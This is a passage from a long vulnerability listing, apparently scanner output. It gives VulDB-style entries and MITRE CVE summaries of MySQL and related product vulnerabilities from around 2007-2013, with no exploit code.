20066| [9657] Oracle MySQL Server up to 5.5.31/5.6.11 Audit Log information disclosure
20067| [9656] Oracle MySQL Server up to 5.6.11 MemCached unknown vulnerability
20068| [9655] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 GIS Crash denial of service
20069| [64198] Wireshark up to 1.8.6 MySQL Dissector Integer denial of service
20070| [64010] Ruby on Rails 3.1.0 MySQL Database Stored unknown vulnerability
20071| [8418] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Server Locking unknown vulnerability
20072| [8416] Oracle MySQL Server up to 5.1.63 Server Types unknown vulnerability
20073| [8415] Oracle MySQL Server up to 5.6.10 Server Privileges denial of service
20074| [8414] Oracle MySQL Server up to 5.6.10 InnoDB denial of service
20075| [8413] Oracle MySQL Server up to 5.5.30/5.6.10 InnoDB unknown vulnerability
20076| [8412] Oracle MySQL Server up to 5.6.10 Data Manipulation Language denial of service
20077| [8411] Oracle MySQL Server up to 5.5.30/5.6.10 Stored Procedure unknown vulnerability
20078| [8410] Oracle MySQL Server up to 5.1.67/5.5.29 Server XML denial of service
20079| [8409] Oracle MySQL Server up to 5.5.29 Server Replication denial of service
20080| [8408] Oracle MySQL Server up to 5.1.67/5.5.29 Server Partition unknown vulnerability
20081| [8407] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Optimizer unknown vulnerability
20082| [8406] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 InnoDB unknown vulnerability
20083| [8405] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Information Schema unknown vulnerability
20084| [8404] Oracle MySQL Server up to 5.5.29 Data Manipulation Language denial of service
20085| [8403] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Data Manipulation Language unknown vulnerability
20086| [8402] Oracle MySQL Server up to 5.5.29/5.6.10 Server Optimizer denial of service
20087| [8401] Oracle MySQL Server up to 5.6.10 MemCached denial of service
20088| [8400] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Privileges unknown vulnerability
20089| [8399] Oracle MySQL Server up to 5.1.66/5.5.28 Server Privileges unknown vulnerability
20090| [8398] Oracle MySQL Server up to 5.1.67/5.5.29 unknown vulnerability
20091| [8397] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Information Schema unknown vulnerability
20092| [8396] Oracle MySQL Server up to 5.1.67/5.5.29 Server Locking unknown vulnerability
20093| [8395] Oracle MySQL Server up to 5.6.10 Data Manipulation Language denial of service
20094| [10871] Oracle MySQL 5.3.12/5.5.30/10.0.1 MyISAM Engine init_search SELECT Statement denial of service
20095| [8065] Oracle MySQL up to 5.5.27 yaSSL memory corruption
20096| [8064] Oracle MySQL up to 5.5.29 yaSSL memory corruption
20097| [8816] Wireshark up to 1.8.5 MySQL Dissector packet-mysql.c Packet denial of service
20098| [8019] Oracle MySQL 5.2.11 Representation Converter Eingabe Crash denial of service
20099| [7431] Oracle MySQL Server up to 5.5.28 Privileges denial of service
20100| [7430] Oracle MySQL Server up to 5.5.28 Partition denial of service
20101| [7429] Oracle MySQL Server up to 5.5.28 Optimizer denial of service
20102| [7428] Oracle MySQL Server up to 5.1.66/5.5.28 Optimizer unknown vulnerability
20103| [7427] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
20104| [7426] Oracle MySQL Server up to 5.5.28 MyISAM denial of service
20105| [7425] Oracle MySQL Server up to 5.1.66/5.5.28 InnoDB unknown vulnerability
20106| [7424] Oracle MySQL Server up to 5.5.28 InnoDB denial of service
20107| [7423] Oracle MySQL Server up to 5.1.66/5.5.28 Locking unknown vulnerability
20108| [7422] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
20109| [7421] Oracle MySQL Server up to 5.1.66/5.1.28 Replication unknown vulnerability
20110| [7419] Oracle MySQL Server up to 5.5.28 Stored Procedure denial of service
20111| [7418] Oracle MySQL Server up to 5.1.66/5.5.28 Server Optimizer unknown vulnerability
20112| [7417] Oracle MySQL Server up to 5.1.66/5.5.28 Information Schema unknown vulnerability
20113| [7416] Oracle MySQL Server up to 5.1.65/5.5.27 GIS Extension denial of service
20114| [7415] Oracle MySQL Server up to 5.1.66/5.5.28 Privileges Stack-based memory corruption
20115| [7414] Oracle MySQL Server up to 5.5.28 Parser Heap-based memory corruption
20116| [63111] Oracle MySQL 5.5.19 Installation denial of service
20117| [7068] Oracle MySQL Server up to 5.5.19 Authentication information disclosure
20118| [7067] Oracle MySQL Server up to 5.5.19 sql/sql_acl.cc acl_get memory corruption
20119| [7066] Oracle MySQL Server up to 5.5.19 SELECT Command Crash denial of service
20120| [7065] Oracle MySQL Server up to 5.5.19 Create Table MDL_key::mdl_key_init memory corruption
20121| [6795] Oracle MySQL Server up to 5.1.64/5.5.26 Server Replication denial of service
20122| [6794] Oracle MySQL Server up to 5.1.63/5.5.25 Server Full Text Search denial of service
20123| [6793] Oracle MySQL Server up to 5.5.25 unknown vulnerability
20124| [6792] Oracle MySQL Server up to 5.5.26 MySQL Client information disclosure
20125| [6791] Oracle MySQL Server up to 5.1.65/5.5.27 Server Optimizer denial of service
20126| [6790] Oracle MySQL Server up to 5.1.64/5.5.26 Server Optimizer denial of service
20127| [6789] Oracle MySQL Server up to 5.5.26 unknown vulnerability
20128| [6788] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB Plugin denial of service
20129| [6787] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB unknown vulnerability
20130| [6786] Oracle MySQL Server up to 5.5.26 MySQL Client sql injection
20131| [6785] Oracle MySQL Server up to 5.1.65/5.5.27 denial of service
20132| [6784] Oracle MySQL Server up to 5.1.64/5.5.26 Protocol unknown vulnerability
20133| [6783] Oracle MySQL Server up to 5.1.64/5.5.26 Information Schema memory corruption
20134| [62299] SilverStripe up to 2.4.5 MySQL Database sql injection
20135| [61672] MySQL unknown vulnerability
20136| [61567] MySQLDumper 1.24.4 Error Message information disclosure
20137| [61566] MySQLDumper 1.24.4 Restore information disclosure
20138| [61565] MySQLDumper 1.24.4 directory traversal
20139| [61564] MySQLDumper 1.24.4 deletehtaccess cross site request forgery
20140| [61563] MySQLDumper 1.24.4 index.php cross site scripting
20141| [5783] Oracle MySQL Server up to 5.1.62/5.5.22 Server Optimizer denial of service
20142| [5782] Oracle MySQL Server up to 5.1.62/5.5.23 Server Optimizer denial of service
20143| [5781] Oracle MySQL Server up to 5.5.23 denial of service
20144| [5780] Oracle MySQL Server up to 5.5.23 InnoDB denial of service
20145| [5779] Oracle MySQL Server up to 5.1.62/5.5.23 GIS Extension unknown vulnerability
20146| [5778] Oracle MySQL Server up to 5.5.23 Server Optimizer denial of service
20147| [5635] Oracle MySQL Server up to 5.5.25 on Linux InnoDB UPDATE denial of service
20148| [5503] Oracle MySQL up to 5.6.5 Password Authentication sql/password.c memcmp weak authentication
20149| [5168] Oracle MySQL Server Optimizer denial of service
20150| [5166] Oracle MySQL Server up to 5.5.21 Partition denial of service
20151| [5165] Oracle MySQL Server up to 5.5.19 Optimizer denial of service
20152| [5159] Oracle MySQL Server up to 5.1.61/5.5.21 Optimizer denial of service
20153| [5158] Oracle MySQL Server up to 5.1.61/5.5.21 DML denial of service
20154| [5151] Oracle MySQL Server up to 5.1.60/5.5.19 MyISAM denial of service
20155| [5981] Oracle MySQL Server 5.1.62/5.5.23 Sort Order Index Calculation denial of service
20156| [5072] Oracle MySQL Server up to 5.5.21 denial of service
20157| [4627] Oracle MySQL up to 5.5.20 memory corruption
20158| [60055] WordPress up to 1.2 MySQL Database denial of service
20159| [5236] Oracle MySQL Server 5.5.x unknown vulnerability
20160| [5235] Oracle MySQL Server 5.5.x denial of service
20161| [5233] Oracle MySQL Server 5.5.x denial of service
20162| [5232] Oracle MySQL Server 5.5.x denial of service
20163| [5231] Oracle MySQL Server 5.5.x denial of service
20164| [5230] Oracle MySQL Server 5.5.x denial of service
20165| [5229] Oracle MySQL Server 5.5.x denial of service
20166| [5228] Oracle MySQL Server 5.5.x denial of service
20167| [5227] Oracle MySQL Server 5.5.x unknown vulnerability
20168| [5226] Oracle MySQL Server 5.1.x/5.5.x denial of service
20169| [5225] Oracle MySQL Server 5.1.x/5.5.x denial of service
20170| [5224] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20171| [5223] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20172| [5222] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20173| [5221] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20174| [5220] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20175| [5219] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20176| [5218] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20177| [5217] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
20178| [5216] Oracle MySQL Server 5.0.x/5.1.x/5.5.x denial of service
20179| [5215] Oracle MySQL Server 5.0.x/5.1.x/5.5.x information disclosure
20180| [5213] Oracle MySQL Server 5.0.x/5.1.x/5.5.x unknown vulnerability
20181| [5212] Oracle MySQL Server 5.0.x/5.1.x denial of service
20182| [5211] Oracle MySQL Server 5.0.x/5.1.x denial of service
20183| [5210] Oracle MySQL Server 5.0.x/5.1.x denial of service
20184| [59882] MySQL 5.5.8 NULL Pointer Dereference denial of service
20185| [59384] Hiroyuki Oyama DBD::mysqlPP up to 0.04 MySQL sql injection
20186| [58706] Taskfreak! Multi-mysql 0.6 Error Message information disclosure
20187| [57356] Trustwave WebDefend 2.0/3.0/5.0 MySQL Database unknown vulnerability
20188| [56109] PHP 5.3.2/5.3.3 mysqli mysqli_fetch_assoc sql injection
20189| [56085] MySQL up to 5.1.25 init_from_wkb denial of service
20190| [56084] MySQL up to 5.1.25 Stored Procedure denial of service
20191| [56083] MySQL Crash denial of service
20192| [56082] MySQL Use-After-Free denial of service
20193| [56081] MySQL Optimizer Crash denial of service
20194| [56080] MySQL up to 5.1.25 Stored denial of service
20195| [56079] MySQL Crash denial of service
20196| [56078] MySQL Create Table Crash denial of service
20197| [56025] MySQL up to 5.1.25 Crash denial of service
20198| [56024] MySQL up to 5.1.25 store denial of service
20199| [56023] MySQL up to 5.1.25 Crash denial of service
20200| [56022] MySQL up to 5.1.25 Crash denial of service
20201| [56021] MySQL up to 5.1.25 Uninitialized Memory denial of service
20202| [56020] MySQL up to 5.1.25 Crash denial of service
20203| [56019] MySQL up to 5.1.25 Crash denial of service
20204| [56018] mysql up to 5.1.25 Configuration Parameter denial of service
20205| [60789] TYPO3 up to 4.4.4 MySQL Database escapeStrForLike information disclosure
20206| [62294] SilverStripe 2.4.0/2.4.1/2.4.2/2.4.3 MySQLDatabase.php unknown vulnerability
20207| [54434] PHP 5.3.0/5.3.1/5.3.2 php_mysqlnd_auth_write sql injection
20208| [54433] PHP 5.3.0/5.3.1/5.3.2 MySQL php_mysqlnd_read_error_from_line memory corruption
20209| [54432] PHP 5.3.0/5.3.1/5.3.2 mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read memory corruption
20210| [54026] MySQL up to 5.1.25 Crash denial of service
20211| [53483] MySQL up to 5.0.0.0 memory corruption
20212| [53482] MySQL up to 5.0.0.0 my_net_skip_rest denial of service
20213| [53481] MySQL up to 5.0.0.0 directory traversal
20214| [53212] mysql 5.1.45 mysql_uninstall_plugin unknown vulnerability
20215| [53118] Csphere ClanSphere up to 2009.0.3 MySQL Database generate.php cs_sql_select sql injection
20216| [53053] TaskFreak TaskFreak! up to 0.1.3 tzn_mysql.php loadByKey sql injection
20217| [52985] Oracle MySQLConnector NET up to 6.0.2 SSL Certificate spoofing
20218| [51369] mysql 5.0.51a CertDecoder::GetName memory corruption
20219| [51581] TYPO3 Kiddog Mysqldumper up to 0.0.3 information disclosure
20220| [50962] MySQL Certificates viosslfactories.c vio_verify_callback spoofing
20221| [50961] mysql GeomFromWKB denial of service
20222| [50960] MySQL up to 5.0.0.0 Access Restriction Symlink privilege escalation
20223| [50531] mysql-ocaml 1.0.4 MySQL mysql_real_escape_string unknown vulnerability
20224| [48981] MySQL up to 4.0.23 sql_parse.cc dispatch_command denial of service
20225| [48263] Surat Kabar phpWebNews 0.2 MySQL index.php sql injection
20226| [48262] Surat Kabar phpWebNews 0.1/0.2 MySQL bukutamu.php sql injection
20227| [47455] auth2db up to 0.2.6 MySQL mysql_real_escape_string sql injection
20228| [46983] MySQL up to 6.0.10-bzr ExtractValue denial of service
20229| [46798] Getmiro Broadcast Machine 0.1 MySQLController.php privilege escalation
20230| [46636] MyBlog MySQL Database Cleartext information disclosure
20231| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
20232| [46028] Joey Schulze Mod Auth Mysql 2.x mod_auth_mysql.c sql injection
20233| [45774] Constructr CMS up to 3.02.5 MySQL Database Cleartext information disclosure
20234| [45668] Nodstrum MySQL Calendar 1.1 index.php sql injection
20235| [45669] Nodstrum MySQL Calendar 1.1 unknown vulnerability
20236| [45016] Deeserver Panuwat PromoteWeb MySQL go.php sql injection
20237| [44358] MySQL up to 5.0.67 cross site scripting
20238| [44357] MySQL Quick Admin up to 1.5.5 index.php directory traversal
20239| [44356] MySQL Quick Admin 1.5.5 actions.php directory traversal
20240| [44131] NooMS 1.1 MySQL db.php information disclosure
20241| [44076] MySQL Create Table Symlink privilege escalation
20242| [44075] MySQL 5.0.51a Create Table Symlink privilege escalation
20243| [43987] MySQL Crash denial of service
20244| [43825] Aquagardensoft mysql-lists 1.2 cross site scripting
20245| [43819] Craftysyntax Crafty Syntax Live Help up to 1.7 MySQL Database Cleartext information disclosure
20246| [43625] Keld PHP-MySQL News Script 0.7.1 login.php sql injection
20247| [43123] BlognPlus 2.5.5 MySQL index.php sql injection
20248| [42939] Relative Real Estate Systems up to 3.0 MySQL Database Cleartext information disclosure
20249| [42912] AlstraSoft AskMe 2.1 MySQL Database Cleartext information disclosure
20250| [42868] BlognPlus 2.5.4 MySQL sql injection
20251| [42205] miniBB 2.2 MySQL setup_mysql.php sql injection
20252| [41891] Terong Advanced Web Photo Gallery 1.0 MySQL Database Cleartext information disclosure
20253| [40486] MySQL up to 1.7.5 handshake.cpp processoldclienthello memory corruption
20254| [40219] PHP MySQL Banner Exchange 2.2.1 inc/lib.inc unknown vulnerability
20255| [39993] MySQL denial of service
20256| [3499] Sun MySQL up to 6.0.3 System Table Information privilege escalation
20257| [40030] aurora framework 20071208 MySQL db_mysql.lib pack_var sql injection
20258| [3469] Sun MySQL 5.1.23 Bk InnoDB denial of service
20259| [39991] MySQL up to 6.0.4 denial of service
20260| [39292] Asterisk-Addons 1.2.7/1.4.3 MySQL sql injection
20261| [41090] MySQL Mysql Community Server up to 5.1.4 unknown vulnerability
20262| [38781] PHP 5.2.4 MySQL memory corruption
20263| [38618] PHP 4.4.7/5.2.3 mysqli sql injection
20264| [85747] InterWorx SiteWorx mysql.php cross site scripting
20265| [85735] InterWorx NodeWorx mysql.php cross site scripting
20266| [37818] MySQL Community Server up to 5.0.40 denial of service
20267| [39994] MySQL Federated Crash denial of service
20268| [37641] MySQLDumper htaccess privilege escalation
20269| [86077] NetClassifieds Mysql_db.php information disclosure
20270| [37816] MySQL Community Server up to 5.0.40 Crash denial of service
20271| [36814] MySQL up to 5.1.17 information disclosure
20272| [36669] MySQL 4.0.1 unknown vulnerability
20273| [36813] mysql up to 5.1.17 thd::db_access denial of service
20274| [36812] MySQL up to 5.1.17 unknown vulnerability
20275| [36502] Burnstone burnCMS 0.2 mysql.class.php privilege escalation
20276| [36364] GPL PHP Board unstable-2001.11.14-1 mysqli db.mysql.inc.php privilege escalation
20277| [36700] MySQL up to 5.0.39 item_cmpfunc.cc in_decimal::set denial of service
20278| [35917] Advanced Website Creator MySQL sql injection
20279| [35916] Eve-Nuke Forum 0.1 MySQL db/mysql.php privilege escalation
20280| [35605] bitesser MySQL Commander up to 2.7 ressourcen/dbopen.php privilege escalation
20281| [85480] Fantastico includes/mysqlconfig.php directory traversal
20282| [85141] ActiveCalendar data/mysqlevents.php cross site scripting
20283| [85212] WGS-PPC config/mysql_config.php privilege escalation
20284| [34894] MySQLNewsEngine MySQL affichearticles.php3 privilege escalation
20285| [34576] MyODBC MySQL Database denial of service
20286| [37817] MySQL Community Server up to 5.0.40 Create Table information disclosure
20287| [34117] The Address Book 1.04e MySQL Database export.php information disclosure
20288| [34223] MySQL 5.0.30/5.1.13 sql_select.cc denial of service
20289| [33690] Widcomm BTSaveMySql 1.2 MySQL information disclosure
20290| [33257] iWonder Designs Storystream 0.4.0.0 mysql.php sql injection
20291| [33092] Pentaho Business Intelligence Suite up to 1.1 MySQL sql injection
20292| [32736] MysqlDumper 1.21 B6 sql.php cross site scripting
20293|
20294| MITRE CVE - https://cve.mitre.org:
20295| [CVE-2013-3812] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
20296| [CVE-2013-3811] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3806.
20297| [CVE-2013-3810] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA Transactions.
20298| [CVE-2013-3809] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log.
20299| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
20300| [CVE-2013-3807] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Server Privileges.
20301| [CVE-2013-3806] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3811.
20302| [CVE-2013-3805] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements.
20303| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20304| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
20305| [CVE-2013-3801] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
20306| [CVE-2013-3798] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect integrity and availability via unknown vectors related to MemCached.
20307| [CVE-2013-3796] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20308| [CVE-2013-3795] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
20309| [CVE-2013-3794] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
20310| [CVE-2013-3793] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
20311| [CVE-2013-3783] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Parser.
20312| [CVE-2013-3561] Multiple integer overflows in Wireshark 1.8.x before 1.8.7 allow remote attackers to cause a denial of service (loop or application crash) via a malformed packet, related to a crash of the Websocket dissector, an infinite loop in the MySQL dissector, and a large loop in the ETCH dissector.
20313| [CVE-2013-3221] The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and 3.2.x does not ensure that the declared data type of a database column is used during comparisons of input values to stored values in that column, which makes it easier for remote attackers to conduct data-type injection attacks against Ruby on Rails applications via a crafted value, as demonstrated by unintended interaction between the "typed XML" feature and a MySQL database.
20314| [CVE-2013-2395] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-1567.
20315| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20316| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
20317| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20318| [CVE-2013-2381] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server Privileges.
20319| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
20320| [CVE-2013-2376] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
20321| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
20322| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
20323| [CVE-2013-1570] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote attackers to affect availability via unknown vectors related to MemCached.
20324| [CVE-2013-1567] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-2395.
20325| [CVE-2013-1566] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20326| [CVE-2013-1555] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
20327| [CVE-2013-1552] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
20328| [CVE-2013-1548] Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
20329| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
20330| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
20331| [CVE-2013-1531] Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
20332| [CVE-2013-1526] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
20333| [CVE-2013-1523] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Optimizer.
20334| [CVE-2013-1521] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
20335| [CVE-2013-1512] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
20336| [CVE-2013-1511] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20337| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
20338| [CVE-2013-1502] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition.
20339| [CVE-2013-1492] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.30, has unspecified impact and attack vectors, a different vulnerability than CVE-2012-0553.
20340| [CVE-2013-0389] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20341| [CVE-2013-0386] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
20342| [CVE-2013-0385] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
20343| [CVE-2013-0384] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
20344| [CVE-2013-0383] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
20345| [CVE-2013-0375] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
20346| [CVE-2013-0371] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability, related to MyISAM.
20347| [CVE-2013-0368] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20348| [CVE-2013-0367] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
20349| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
20350| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
20351| [CVE-2012-5613] ** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
20352| [CVE-2012-5612] Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions through 5.5.28, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code, as demonstrated using certain variations of the (1) USE, (2) SHOW TABLES, (3) DESCRIBE, (4) SHOW FIELDS FROM, (5) SHOW COLUMNS FROM, (6) SHOW INDEX FROM, (7) CREATE TABLE, (8) DROP TABLE, (9) ALTER TABLE, (10) DELETE FROM, (11) UPDATE, and (12) SET PASSWORD commands.
20353| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
20354| [CVE-2012-5383] ** DISPUTED ** Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation.
20355| [CVE-2012-5096] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users with Server Privileges to affect availability via unknown vectors.
20356| [CVE-2012-5060] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.65 and earlier and 5.5.27 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
